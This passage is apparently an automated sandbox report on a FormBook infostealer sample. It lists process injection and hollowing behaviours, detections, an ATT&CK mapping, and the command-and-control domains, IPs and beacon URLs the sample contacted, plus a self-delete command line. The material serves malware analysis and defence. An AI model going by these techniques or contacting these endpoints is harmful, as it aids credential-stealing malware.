          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 300000
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
          Source: explorer.exe, 00000004.00000002.478596652.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery141Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385309 Sample: NdBLyH2h5d.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 32 www.plaisterpress.com 2->32 34 www.missjeschickt.com 2->34 36 missjeschickt.com 2->36 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 4 other signatures 2->60 11 NdBLyH2h5d.exe 18 2->11         started        signatures3 process4 dnsIp5 44 192.168.2.1 unknown unknown 11->44 30 C:\Users\user\AppData\...\6oxdti6l9qd.dll, PE32 11->30 dropped 70 Detected unpacking (changes PE section rights) 11->70 72 Maps a DLL or memory area into another process 11->72 74 Tries to detect virtualization through RDTSC time measurements 11->74 76 Contains functionality to prevent local Windows debugging 11->76 16 NdBLyH2h5d.exe 11->16         started        file6 signatures7 process8 signatures9 46 Modifies the context of a thread in another process (thread injection) 16->46 48 Maps a DLL or memory area into another process 16->48 50 Sample uses process hollowing technique 16->50 52 Queues an APC in another process (thread injection) 16->52 19 explorer.exe 16->19 injected process10 dnsIp11 38 missjeschickt.com 81.169.145.72, 49734, 80 STRATOSTRATOAGDE Germany 19->38 40 zagorafinancial.com 162.209.114.201, 49723, 80 RACKSPACEUS United States 19->40 42 20 other IPs or domains 19->42 62 System process connects to network (likely due to code injection or exploit) 19->62 23 rundll32.exe 19->23         started        signatures12 process13 signatures14 64 Modifies the context of a thread in another process (thread injection) 23->64 66 Maps a DLL or memory area into another process 23->66 68 Tries to detect virtualization through RDTSC time measurements 23->68 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NdBLyH2h5d.exe21%VirustotalBrowse
          NdBLyH2h5d.exe8%MetadefenderBrowse
          NdBLyH2h5d.exe29%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.rundll32.exe.4d44f8.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.NdBLyH2h5d.exe.2640000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.NdBLyH2h5d.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.NdBLyH2h5d.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.rundll32.exe.4b17960.5.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fibermover.com/uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp100%Avira URL Cloudmalware
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.missjeschickt.com/uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.przyczepy.net/uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.montcoimmigrationlawyer.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.funnyfootballmugs.com/uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          www.montcoimmigrationlawyer.com/uoe8/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.mojilifenoosa.com/uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.3992199.com/uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.zagorafinancial.com/uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.swashbug.com/uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          		52.15.160.167
          		truefalse
            		high
            montcoimmigrationlawyer.com
            		184.168.131.241
            		truetrue
              		unknown
              missjeschickt.com
              		81.169.145.72
              		truetrue
                		unknown
                www.przyczepy.net
                		185.253.212.22
                		truetrue
                  		unknown
                  k9cdna.51w4.com
                  		45.142.156.44
                  		truetrue
                    		unknown
                    www.swashbug.com
                    		169.1.24.244
                    		truetrue
                      		unknown
                      mojilifenoosa.com
                      		184.168.131.241
                      		truetrue
                        		unknown
                        zagorafinancial.com
                        		162.209.114.201
                        		truetrue
                          		unknown
                          shops.myshopify.com
                          		23.227.38.74
                          		truetrue
                            		unknown
                            fibermover.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              www.hispekdiamond.com
                              		213.171.195.105
                              		truetrue
                                		unknown
                                www.plaisterpress.com
                                		104.21.24.135
                                		truetrue
                                  		unknown
                                  www.borderlesstrade.info
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.bl927.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.montcoimmigrationlawyer.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.mojilifenoosa.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.missjeschickt.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.3992199.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.fibermover.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.funnyfootballmugs.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.7chd.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.cdefenders.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.zagorafinancial.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.fibermover.com/uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.missjeschickt.com/uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.przyczepy.net/uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.montcoimmigrationlawyer.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.funnyfootballmugs.com/uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        www.montcoimmigrationlawyer.com/uoe8/true
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.mojilifenoosa.com/uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.3992199.com/uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zagorafinancial.com/uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.swashbug.com/uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.comexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/iptrundll32.exe, 00000006.00000002.483040430.0000000004C92000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.tiro.comexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.goodfont.co.krexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.carterandcone.comlexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.typography.netDexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://fontfabrik.comexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.fonts.comexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.sandoll.co.krexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.sakkal.comexplorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown

                                                                            Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            45.142.156.44
                                                                            		k9cdna.51w4.comUnited Kingdom
                                                                            		40065CNSERVERSUStrue
                                                                            23.227.38.74
                                                                            		shops.myshopify.comCanada
                                                                            		13335CLOUDFLARENETUStrue
                                                                            184.168.131.241
                                                                            		montcoimmigrationlawyer.comUnited States
                                                                            		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                            162.209.114.201
                                                                            		zagorafinancial.comUnited States
                                                                            		27357RACKSPACEUStrue
                                                                            185.253.212.22
                                                                            		www.przyczepy.netPoland
                                                                            		48707GREENER-ASPLtrue
                                                                            81.169.145.72
                                                                            		missjeschickt.comGermany
                                                                            		6724STRATOSTRATOAGDEtrue
                                                                            34.102.136.180
                                                                            		fibermover.comUnited States
                                                                            		15169GOOGLEUSfalse
                                                                            169.1.24.244
                                                                            		www.swashbug.comSouth Africa
                                                                            		37611AfrihostZAtrue
                                                                            52.15.160.167
                                                                            		prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                                                            		16509AMAZON-02USfalse
                                                                            213.171.195.105
                                                                            		www.hispekdiamond.comUnited Kingdom
                                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                            Private

                                                                            IP
                                                                            192.168.2.1

                                                                            General Information

                                                                            Joe Sandbox Version:31.0.0 Emerald
                                                                            Analysis ID:385309
                                                                            Start date:12.04.2021
                                                                            Start time:10:04:36
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 9m 39s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:light
                                                                            Sample file name:NdBLyH2h5d.exe
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:31
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winEXE@7/3@15/11
                                                                            EGA Information:Failed
                                                                            HDC Information:
                                                                            • Successful, ratio: 27.1% (good quality ratio 25%)
                                                                            • Quality average: 75.8%
                                                                            • Quality standard deviation: 30.3%
                                                                            HCA Information:
                                                                            • Successful, ratio: 92%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Adjust boot time
                                                                            • Enable AMSI
                                                                            • Found application associated with file extension: .exe
                                                                            Warnings:
                                                                            Show All
                                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                            • TCP Packets have been reduced to 100
                                                                            • Excluded IPs from analysis (whitelisted): 13.88.21.125, 92.122.145.220, 104.42.151.234, 40.88.32.150, 184.30.24.56, 20.82.210.154, 13.64.90.137, 8.241.79.126, 8.241.78.254, 8.241.83.126, 8.238.28.254, 8.241.89.126, 92.122.213.247, 92.122.213.194, 20.54.26.129, 104.43.193.48, 20.82.209.183, 172.67.212.56, 104.21.53.110
